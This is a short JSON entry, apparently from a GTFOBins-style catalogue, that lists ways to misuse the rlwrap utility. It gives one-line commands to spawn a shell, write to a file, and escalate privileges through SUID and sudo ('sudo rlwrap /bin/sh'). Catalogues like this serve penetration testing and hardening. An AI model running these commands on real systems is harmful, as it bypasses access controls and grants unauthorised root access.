You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

25 lines
458 B
JSON

{
"functions": {
"shell": [
{
"code": "rlwrap /bin/sh"
}
],
"file-write": [
{
"description": "This adds timestamps to the output file. This relies on the external 'echo' command.",
"code": "rlwrap -l [file] echo DATA\n"
}
],
"suid": [
{
"code": "./rlwrap -H /dev/null /bin/sh -p"
}
],
"sudo": [
{
"code": "sudo rlwrap /bin/sh"
}
]
}
}